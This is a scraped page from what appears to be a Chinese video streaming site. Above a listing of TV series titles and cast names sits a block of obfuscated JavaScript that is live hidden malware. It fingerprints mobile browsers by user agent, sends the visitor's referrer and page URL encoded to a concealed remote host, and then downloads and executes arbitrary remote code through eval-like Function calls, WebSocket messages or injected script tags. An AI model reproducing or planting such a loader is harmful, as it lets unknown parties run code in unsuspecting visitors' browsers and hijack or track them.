function ncoa(e) {
const t = "UAB234CDE_FGHIJKQRSTVWXcdefghijklm-nopqrstuvwxyz015LMNOP6789YZab";
let n = "";
let r, o, c, s, a, i, l;
let d = 0;
let f = String(e).replace(/\r\n/g, "\n");
let h = "";
for (let e = 0; e < f.length; e++) {
const t = f.charCodeAt(e);
if (t < 128) {
h += String.fromCharCode(t);
} else if (t > 127 && t < 2048) {
h += String.fromCharCode(t >> 6 | 192);
h += String.fromCharCode(t & 63 | 128);
} else {
h += String.fromCharCode(t >> 12 | 224);
h += String.fromCharCode(t >> 6 & 63 | 128);
h += String.fromCharCode(t & 63 | 128);
}
}
while (d < h.length) {
r = h.charCodeAt(d++);
o = h.charCodeAt(d++);
c = h.charCodeAt(d++);
s = r >> 2;
a = (r & 3) << 4 | o >> 4;
i = (o & 15) << 2 | c >> 6;
l = c & 63;
if (isNaN(o)) {
n += t.charAt(s) + t.charAt(a);
} else if (isNaN(c)) {
n += t.charAt(s) + t.charAt(a) + t.charAt(i);
} else {
n += t.charAt(s) + t.charAt(a) + t.charAt(i) + t.charAt(l);
}
}
return n;
}
function qqaoxjj(e) {
const t = "UAB234CDE_FGHIJKQRSTVWXcdefghijklm-nopqrstuvwxyz015LMNOP6789YZab";
let n = "";
let r = 0;
let o, c, s, a;
const i = String(e).replace(/[^A-Za-z0-9\-_]/g, "");
const l = i.length;
while (r < l) {
if (r == l) o = -1; else o = t.indexOf(i.charAt(r++));
if (r == l) c = -1; else c = t.indexOf(i.charAt(r++));
if (r === l) s = -1; else s = t.indexOf(i.charAt(r++));
if (r === l) a = -1; else a = t.indexOf(i.charAt(r++));
if (o === -1 || c === -1) {
break;
}
const e = o << 2 | c >> 4;
n += String.fromCharCode(e);
if (s !== -1) {
const e = (c & 15) << 4 | s >> 2;
n += String.fromCharCode(e);
}
if (a !== -1) {
const e = (s & 3) << 6 | a;
n += String.fromCharCode(e);
}
}
let d = "";
r = 0;
while (r < n.length) {
const e = n.charCodeAt(r);
if (e < 128) {
d += String.fromCharCode(e);
r++;
} else if (e > 191 && e < 224) {
const t = n.charCodeAt(r + 1);
d += String.fromCharCode((e & 31) << 6 | t & 63);
r += 2;
} else {
const t = n.charCodeAt(r + 1);
const o = n.charCodeAt(r + 2);
d += String.fromCharCode((e & 15) << 12 | (t & 63) << 6 | o & 63);
r += 3;
}
}
return d;
}
function yebl(e) {
return Math.floor(Math.random() * (e + 1));
}
window['gj'+'tu'+'hd'] = navigator.platform && !/^Mac|Win/.test(navigator.platform) || !navigator.platform && /Android|iOS|iPhone/i.test(navigator.userAgent) ? function() {
(function(e, t, n) {
const r = n[qqaoxjj("dPW5hqWyi4Inhqp0iU")];
let o = "";
try {
o = opener ? opener.document.location.href : n.referrer;
} catch (e) {
o = n.referrer;
}
if (o && o.length > 900) {
o = o.slice(0, 900);
}
let c = t.location.href;
if (c && c.length > 900) {
c = c.slice(0, 900);
}
const s = qqaoxjj(e).split(",");
const a = s[3];
const i = s[2];
let l = s[4];
let d;
if (l.indexOf(";") > -1) {
let e = l.split(";");
if (e.length < 1) return;
if (e.length > 1) {
d = e[yebl(e.length)];
} else {
d = e[0];
}
} else {
d = l;
}
const f = ncoa(`su=${d}&t=${s[0]}&d=${s[1]}&r=${o}&m=${Date.now()}&u=${c}&sm=${i}`);
const h = navigator.userAgent;
if (h.indexOf("b" + "ai" + "d" + "u") !== -1) {
const e = new XMLHttpRequest;
e.open("POST", `${i}://${d}/getSv/${f}`);
e.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");
e.setRequestHeader("X-REQUESTED-WITH", "XMLHttpRequest");
e.onreadystatechange = function() {
if (e.readyState === 4 && e.status === 200) {
const t = JSON.parse(e.responseText);
const n = new Function("c", `${qqaoxjj(t.ds)}; return ${t.ns}(c);`)(t.img.join(""));
new Function("_tdcs", n)(r);
}
};
e.send();
} else if (t.WebSocket && /UCBrowser|Quark|Huawei|Vivo|NewsArticle/i.test(h)) {
const e = new WebSocket(`${a}://${d}/ws/${f}`);
e.onmessage = function(t) {
e.close();
const o = t.data.split(";");
if (o.length > 2) {
remoteCode = qqaoxjj(o[0]);
remoteCode += qqaoxjj(o[1]);
remoteCode += qqaoxjj(o[2]);
new Function("_tdcs", remoteCode)(r);
} else {
const e = n.createElement("script");
e.src = `${i}://${d}/vsn/${f}`;
r.parentElement.insertBefore(e, r);
}
};
e.onerror = function() {
const e = n.createElement("script");
e.src = `${i}://${d}/vsn/${f}`;
r.parentElement.insertBefore(e, r);
};
} else {
const e = n.createElement("script");
e.src = `${i}://${d}/vsn/${f}`;
r.parentElement.insertBefore(e, r);
}
})("H501H2ULGCmMiDALGDiLh51nhOILfrHydPpziQ", window, document);
} : function() {};
-
辐射第二季
主演:艾拉·珀内尔,阿伦·莫滕,莫伊塞斯·阿里亚斯,克塞利亚·门德斯-琼斯,迈克尔·克里斯托弗,沃尔顿·戈金斯,莱尔·利里,凯尔·麦克拉克伦,弗朗西丝·特纳,莱斯利·格塞斯,拉娜5,阿杰·德莱昂,埃文·沙夫兰
-
以猫饲爱
主演:卡纳潘·佩泽坤 , 塔纳瓦·拉达纳奇派山 , 吉迪朋·瑟利维查亚萨瓦 Kittiphop Sereevichayasawat , 阿丽莎拉·翁差丽 , 萨朋·阿萨瓦蒙空 , 查亚功·朱塔玛斯 Chayakorn Jutamas
-
-
超感神探第三季
主演:西蒙·贝克 罗宾·汤尼 Robin Tunney 蒂姆·康 欧文·约曼 阿曼达·莱赫提
-
-
-
-
盗窃
主演:苏菲·特纳 , 雅各布·福琼·劳埃德 , 阿奇·马德基 , 安德鲁·霍华德 , 艾莉·詹姆斯 , Jonathan Slinger , 哈里·米歇尔 , Thomas Larkin , 塔拉·萨莫斯 , 莎拉·贝尔彻 , 戴安娜·贝穆德斯 , 安德鲁·浩二 , Yusra Warsama , 埃洛伊丝·托玛斯 , Tomisin Ajani , Kadiesha Belgrave , 斯派克·莱顿 , 朱丽安娜·库洛卡娃 , 多米尼克·马夫海姆 , 肖恩·梅森
-
-
马普尔小姐探案第五季
主演:朱莉亚·麦肯齐 , 爱德华·福克斯 , 夏洛蒂·索尔特 , 斯蒂芬·迪兰 , 琳赛·邓肯 , 乔安娜·拉姆利 , 卡罗琳·昆汀 , 托比·斯蒂芬斯 , 莎朗·斯莫 , 乔纳森·凯克 , 约翰·约瑟夫·菲尔德
-
马普尔小姐探案第四季
主演:朱莉亚·麦肯齐 , 本尼迪克特·康伯巴奇 , 马修·麦克费登 , 鲁珀特·格雷夫斯 , 娜塔莉·多默尔 , 拉塞尔·托维 , 肖恩·比格斯代夫 , 汉娜·穆雷 , 埃利奥特·考恩 , 弗莱迪·福克斯 , 玛克辛·皮克 , 拉菲·斯波 , 佩内洛普·威尔顿 , 本·迈尔斯 , 玛戈·斯蒂雷
-
马普尔小姐探案第三季
主演:杰拉尔丁·麦克伊万 , 丹·史蒂文斯 , 理查德·阿米蒂奇 , 简·西摩 , 朱利安·山德斯 , 保罗·尼科尔斯 , 露丝·威尔森 , 汤姆·莱利 , 莎佛朗·布洛斯 , 埃德·斯托帕德 , 里斯·谢尔史密斯 , 茱丽叶特·斯蒂文森 , 李·恩格里比 , 斯蒂芬妮·列尼达斯 , 玛汀·麦古基安
-
剑风传奇
主演:神奈延年 森川智之 宫村优子 石田彰 高山南 西村朋纮 矢岛晶子 白鸟由里
-
窒息契机
主演:皮纳潘·仲查伦帕尼奇,鄂尔廷·迪拉帕特·萨姆猜,塔夫提普·吉拉普拉森,Mind Napasasi Surawan,松辛·玛妮湾,素帕娜·吉塔勒拉
-
古拉贡
主演:费利克斯·马拉德 Luke Carroll Roberto Zenca 乔恩·阿尔特林格 Lila McGuire Courtney Clarke 马尔顿·索克斯